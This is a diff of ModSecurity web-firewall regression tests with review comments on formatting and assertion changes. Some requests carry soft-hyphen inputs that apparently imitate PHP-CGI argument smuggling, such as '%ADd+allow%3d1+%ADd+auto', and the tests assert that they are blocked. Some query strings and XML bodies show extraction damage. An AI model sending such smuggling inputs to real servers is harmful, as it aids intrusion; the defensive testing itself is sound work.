@@ -345,8 +363,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -355,14 +373,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=%20tEst2", + "uri": "/test.pl?param1=test¶m2=%20tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -394,8 +421,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -404,14 +431,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=tEst2", + "uri": "/test.pl?param1=test¶m2=tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -444,8 +480,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -454,14 +490,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=%20tEst2", + "uri": "/test.pl?param1=test¶m2=%20tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -494,8 +539,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -504,14 +549,16 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -519,8 +566,6 @@ }, "expected": { "audit_log": "\\[audit\\.log]:\\ ---.*\\[audit\\.log]:\\ Keep-Alive", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -553,8 +598,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -563,14 +608,16 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/?%ADd+allow%3d1+%ADd+auto", + "uri": "/?%ADd+allow%3d1+%ADd+auto", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -578,8 +625,6 @@ }, "expected": { "audit_log": "\"match\":\"Matched \\\\\"Operator `ValidateUtf8Encoding' with parameter `' against variable `ARGS_NAMES:\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\(Value: `\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\)\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -612,8 +657,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -624,16 +669,16 @@ "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "3" }, - "uri": "\/?attack=true", + "uri": "/?attack=true", "method": "POST", "http_version": 1.1, "body": [ - "\u00ad=\u00ad" + "­=­" ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -641,8 +686,6 @@ }, "expected": { "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ 
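Review bot: The request body in the `@@ -624,16 +669,16 @@` hunk now holds the soft hyphen as a raw, invisible U+00AD character between the quotes, where the old side spelled it `"\u00ad=\u00ad"`; the `@@ -686,18 +729,18 @@` hunk does the same to the body and to the `X-\u00ad-custom` header name and value. These cases assert that the audit log escapes the input as `\xc2\xad`, so the exact input bytes are what is under test, and a raw soft hyphen cannot be seen in most editors or diff views and is easily dropped or altered by a formatter or a copy-paste. I would keep the escaped spelling, `"\u00ad=\u00ad"` and `"X-\u00ad-custom": "Some \u00ad value"`, which parses to the same string. Separately, the unchanged `"Content-Length": "3"` does not match the five bytes this body encodes to in UTF-8; if that is intentional, the test title should say so.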
@@ -675,8 +718,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -686,18 +729,18 @@ "Cache-Control": "no-cache", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "3", - "X-\u00ad-custom": "Some \u00ad value" + "X-­-custom": "Some ­ value" }, - "uri": "\/?attack=true", + "uri": "/?attack=true", "method": "POST", "http_version": 1.1, "body": [ - "\u00ad=\u00ad" + "­=­" ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -705,8 +748,6 @@ }, "expected": { "audit_log": "\"X-\\\\\\\\xc2\\\\\\\\xad-custom\":\"Some \\\\\\\\xc2\\\\\\\\xad value\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ diff --git a/test/test-cases/regression/collection-case-insensitive.json b/test/test-cases/regression/collection-case-insensitive.json index 83c3a4d818..163e1be4a2 100644 --- a/test/test-cases/regression/collection-case-insensitive.json +++ b/test/test-cases/regression/collection-case-insensitive.json 
@@ -1,57 +1,58 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: Case insensitive (1/1)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: Case insensitive (1/1)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", 
- "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_headers \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=matched_var:%{matched_var}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/collection-lua.json b/test/test-cases/regression/collection-lua.json index 8d8f4e129f..0870acbe37 100644 --- a/test/test-cases/regression/collection-lua.json +++ b/test/test-cases/regression/collection-lua.json 
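Review bot: The assertion changes in collection-case-insensitive.json are buried in a whole-file reformat where every line is marked as changed, which makes it hard to confirm that no expectation was weakened. The lines that alter what the test checks are `"body": [ "" ]` replacing `"body":""`, the removal of `"audit_log":""` and `"error_log":""`, and the new `"http_code": 200`. For a WAF regression suite I would land the whitespace and escaping reformat as its own commit, one whose parsed JSON is identical before and after, and keep these lines in a separate change. The same applies to the whole-file hunks for collection-lua.json, collection-regular_expression_selection.json, collection-resource.json and collection-tx-with-macro.json.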
@@ -1,292 +1,314 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set TX (1/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set TX (1/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: TX.lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: TX.lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:TX.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule TX.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set IP (2/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set IP (2/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": 
"My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:IP.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule IP.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set GLOBAL (3/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set GLOBAL (3/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:GLOBAL.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule GLOBAL.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set RESOURCE (4/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set RESOURCE (4/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:RESOURCE.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule RESOURCE.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set SESSION (5/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set SESSION (5/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:SESSION.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule SESSION.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set USER (6/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set USER (6/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:USER.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule USER.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.getvars ARGS (8/8)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.getvars ARGS (8/8)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?parm1=a&parm2=b", - "method":"GET", - "body": [ ] + "uri": "/whee?parm1=a&parm2=b", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-getvars-args.lua \"id:2,phase:2,deny,status:403\"" ] - } + } ] diff --git a/test/test-cases/regression/collection-regular_expression_selection.json b/test/test-cases/regression/collection-regular_expression_selection.json index 5ac6db40a2..f61865dd97 100644 --- a/test/test-cases/regression/collection-regular_expression_selection.json +++ b/test/test-cases/regression/collection-regular_expression_selection.json 
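Review bot: The last test in collection-lua.json is titled `"Testing LUA :: m.getvars ARGS (8/8)"` while the six tests before it are numbered (1/7) to (6/7), so the file holds seven tests and the final title fits neither the sequence nor the total. Every title line is already rewritten in this hunk, so renumber it to `"title": "Testing LUA :: m.getvars ARGS (7/7)"`. That way a failure report names an unambiguous case.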
@@ -1,58 +1,58 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ 
"\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:nah with value: nops", - "error_log":"", - "http_code":200 + "expected": { + "debug_log": "Saving variable: IP:nah with value: nops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:1,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:2,phase:2,t:lowercase,setvar:IP.nah=nops\"", 
@@ -60,58 +60,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, 